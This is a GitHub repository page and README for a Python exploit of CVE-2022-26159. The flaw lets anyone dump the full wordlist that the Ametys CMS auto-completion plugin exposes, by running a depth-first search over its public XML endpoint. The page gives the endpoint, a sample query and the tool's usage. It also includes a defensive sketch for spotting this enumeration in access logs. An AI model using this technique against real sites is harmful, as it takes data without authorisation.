https://github.com/p0dalirius/cve-2022-26159-ametys-autocompletion-xml
A python exploit to automatically dump all the data stored by the auto-completion plugin of Ametys CMS to a local sqlite database file.
- Host: GitHub
- URL: https://github.com/p0dalirius/cve-2022-26159-ametys-autocompletion-xml
- Owner: p0dalirius
- Created: 2022-02-21T19:59:11.000Z (over 3 years ago)
- Default Branch: main
- Last Pushed: 2022-05-03T10:40:26.000Z (over 3 years ago)
- Last Synced: 2025-04-06T18:23:48.810Z (6 months ago)
- Topics: ametys, autocompletion, cms, exploit, plugin
- Language: Python
- Homepage: https://podalirius.net/
- Size: 159 KB
- Stars: 12
- Watchers: 2
- Forks: 3
- Open Issues: 0
Metadata Files:
- Readme: README.md
- Funding: .github/FUNDING.yml
README
# CVE-2022-26159-Ametys-Autocompletion-XML
A python exploit to automatically dump all the data stored by the auto-completion plugin of Ametys CMS to a local sqlite database file.

## Features
- [x] Automatic detection of maximum results returned by the autocompletion plugin.
- [x] Depth first search to dump all the results.
- [x] Output log file.

## Usage
```
$ ./CVE-2022-26159-Ametys-Autocompletion-XML.py -h
CVE-2022-26159-Ametys-Autocompletion-XML v1.1 - by @podalirius

usage: CVE-2022-26159-Ametys-Autocompletion-XML.py [-h] -t TARGET [-H HEADERS] [-k] [-v | -q] [--no-colors]

Description message

optional arguments:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        arg1 help message
  -H HEADERS, --header HEADERS
                        Specify HTTP headers to use in requests. (e.g., --header "Header1: Value1" --header "Header2: Value2")
  -k, --insecure        Disable SSL/TLS warnings and certificate verification.
  -v, --verbose         Verbose mode. (default: False)
  -q, --quiet           Quiet mode. (default: False)
  --no-colors           Disables colored output. (default: False)
```
## Technical details
The autocompletion plugin in Ametys CMS <= 4.4.9 publicly exposes an XML file containing a wordlist at the following address:
```
https://domain.tld/plugins/web/service/search/auto-completion/domain/en.xml
```

To perform a request on this database, an attacker just needs to type the start of the word in the `q` (query) parameter:
```
https://domain.tld/plugins/web/service/search/auto-completion/domain/en.xml?q=adm
```

And the auto-completion plugin returns the first 10 matching words starting with `adm` (from the query) in an XML file:
```xml
administrateur
administrateurs
administratif
administratifs
administration
administrations
administrative
administratives
administres
admission
```

With this in mind, an attacker just needs to perform a [depth first search on the API](https://podalirius.net/en/articles/scraping-search-apis-depth-first-style/) to extract all of its content.
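On the defensive side, the walk described above leaves a recognisable shape in web server logs: one client requests many one-character extensions of the same prefix, whereas a visitor typing a word extends each prefix only once. The following detection sketch is an added example, not part of this repository; the combined access-log layout, the `min_siblings` threshold, the function names and the sample log lines are assumptions made for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Path prefix taken from the page; the segments after it vary per deployment.
ENDPOINT = "/plugins/web/service/search/auto-completion/"
# Assumed log layout: common/combined access-log format.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "GET (\S+) HTTP/[\d.]+" (\d{3})')

def sibling_fanout(lines):
    """Return {client: {parent_prefix: set(next_chars)}} for auto-completion queries."""
    tree = defaultdict(lambda: defaultdict(set))
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a GET request in the assumed format
        client, target, _status = m.groups()
        url = urlsplit(target)
        if not url.path.startswith(ENDPOINT):
            continue
        q = parse_qs(url.query).get("q", [""])[0].lower()
        if q:
            # Record the last character as a child of the prefix before it.
            tree[client][q[:-1]].add(q[-1])
    return tree

def flag_enumeration(lines, min_siblings=5):
    """Flag clients that request >= min_siblings one-character extensions of one prefix."""
    flagged = {}
    for client, parents in sibling_fanout(lines).items():
        parent, chars = max(parents.items(), key=lambda kv: len(kv[1]))
        if len(chars) >= min_siblings:
            flagged[client] = (parent, len(chars))
    return flagged

def _line(ip, q):
    return (f'{ip} - - [01/Mar/2022:10:00:00 +0000] '
            f'"GET {ENDPOINT}domain/en.xml?q={q} HTTP/1.1" 200 512')

# Constructed sample log: one visitor typing a word, one client walking sibling prefixes.
SAMPLE = [_line("198.51.100.7", q) for q in ("adm", "admi", "admis")]
SAMPLE += [_line("203.0.113.9", "adm" + c) for c in "abcdefgh"]
SAMPLE += [_line("203.0.113.9", "admi" + c) for c in "abc"]

if __name__ == "__main__":
    for client, (parent, n) in flag_enumeration(SAMPLE).items():
        print(f"{client}: {n} sibling queries under prefix {parent!r}")
```

Tune `min_siblings` against normal traffic for the site, and pair the alert with rate limiting on the endpoint while upgrading past the affected versions.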
## Contributing
Pull requests are welcome. Feel free to open an issue if you want to add other features.
## References
- https://podalirius.net/en/cves/2022-26159/
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26159
- https://issues.ametys.org/browse/CMS-10973
- https://podalirius.net/en/articles/scraping-search-apis-depth-first-style/